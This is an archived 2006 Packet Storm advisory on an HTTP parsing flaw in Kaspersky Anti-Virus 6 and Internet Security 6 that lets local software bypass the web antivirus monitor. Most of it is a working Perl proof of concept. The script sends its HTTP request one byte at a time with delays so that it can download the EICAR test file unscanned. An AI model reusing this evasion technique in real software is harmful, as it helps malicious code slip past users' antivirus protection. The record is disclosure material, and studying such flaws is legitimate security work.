Kaspersky6-http.txt

2006-05-26T00:00:00
ID PACKETSTORM:46663
Type packetstorm
Reporter john
Modified 2006-05-26T00:00:00

Description

                                        
                                            `Kaspersky antivirus 6  
Kaspersky internet security 6  
  
www.kaspersky.com  
  
Vulnerable Systems: KAV6, KIS6   
  
Detail:  
The vulnerability is caused due to HTTP parsing errors in the HTTP monitor (Kaspersky Web-antivirus).  
Any mailicious software on local computer can bypass HTTP virus monitor.   
  
Solution:  
There is no known solution.  
  
Exploit code:  
  
This perl script could be run with ActiveState Perl 5.8:  
  
use IO::Socket::INET;  
use strict;  
  
my( $h_srv, $h_port, $h_url ) = ( 'www.eicar.com', 'http(80)',  
'http://www.eicar.com/download/eicar.com' );  
  
syswrite STDOUT, "connecting to $h_srv:$h_port (for $h_url)\n";  
  
my $s = IO::Socket::INET->new( PeerAddr => $h_srv,  
PeerPort => $h_port,  
Proto => 'tcp' );  
die "socket: $!" unless $s;  
  
sendthem( $s,  
"GET $h_url HTTP/1.1",  
"Host: $h_srv",  
""  
);  
my $doc = read_body( $s, read_headers( $s ) );  
syswrite STDOUT,  
'document is <'.$doc.'> len='.length($doc)."\n";  
  
sub sendthem {  
my $s = shift;  
my $c = 0;  
foreach( @_ ) {  
my @a = split //, $_;  
++$c;  
syswrite STDOUT, "query $c: ";  
foreach( @a ) {  
sendone( $s, $_ );  
}  
sendone( $s, "\r" );  
sendone( $s, "\n" );  
}  
}  
  
sub sendone {  
my( $s, $v ) = @_;  
$s->syswrite( $v );  
syswrite STDOUT, $v;  
# !!! comment next line to have monitoring working ;)  
select( undef, undef, undef, 0.300 );  
}  
  
sub read_headers {  
my( $s ) = @_;  
my( $c, $cl ) = ( 0, 0 );  
for( ;; ) {  
my $l = read_line( $s );  
++$c;  
syswrite STDOUT, "header $c: $l";  
syswrite STDOUT, "\r\n";  
last if not $l and $c;  
$cl = $1 if $l =~ /^Content-Length:\s+(\d+)/;  
}  
$cl;  
}  
  
sub read_line {  
my( $s ) = @_;  
my $str = '';  
for( ;; ) {  
my $v = '';  
my $r = $s->sysread( $v, 1 );  
die 'EOF reading headers!' unless $r;  
last if $v eq "\n";  
next if $v eq "\r";  
$str .= $v;  
}  
return $str;  
}  
  
sub read_body {  
my( $s, $cl ) = @_;  
my( $str, $cli ) = ( '', $cl );  
syswrite STDOUT, "reading body <content-length: $cli> ...\n";   
for( ;; ) {  
my $v = '';  
my $r = $s->sysread( $v, 1 );  
last unless $r;  
$str .= $v;  
--$cl if $cli;  
last if not $cl and $cli;  
}  
return $str;  
}  
`